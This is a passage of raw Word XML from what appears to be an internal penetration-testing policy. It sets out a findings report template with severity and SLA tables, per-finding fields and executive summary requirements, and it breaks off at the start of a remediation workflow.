          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Findings Report Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Every penetration test engagement must produce a written findings report using this structure. Reports must be delivered within 5 business days of testing completion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Classification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900"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="6840"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation SLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9.0–10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">24–48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate production risk — data breach, full system compromise, service outage possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7.0–8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="684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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Significant risk — cross-tenant access, auth bypass, sensitive data exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4.0–6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Moderate risk — requires chained exploits or specific conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0.1–3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">90 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="684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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Minimal risk — defense in depth, informational hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Next release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6840"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Best practice recommendations, no exploitable vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Individual Finding Template</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60"/>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC-PENTEST-{YEAR}-{NNN}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="792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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Short descriptive title</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical / High / Medium / Low / Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="792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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Calculated CVSS v3.1 base score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (example)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="792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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Lambda function name, API endpoint, DDB table, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Clear explanation of the vulnerability and how it was found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps to Reproduce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="792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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Numbered steps — must be reproducible by the dev team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshots, HTTP request/response, tool output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="792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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">What an attacker could achieve if this were exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Specific technical fix — not generic advice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="792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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE number, OWASP item, CWE identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Open / In Progress / Resolved / Accepted Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolved Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="792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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ISO date when fix was deployed and verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Every report must include a one-page executive summary with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Total findings by severity (Critical / High / Medium / Low / Informational)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing dates and scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing methodology summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Top 3 most critical findings — one sentence each</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall risk rating — Critical / High / Medium / Low</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation timeline and ownership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation Tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All findings must be tracked to resolution. The security engineering team owns the remediation tracker. Finding owners are assigned at the debrief meeting immediately following each engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
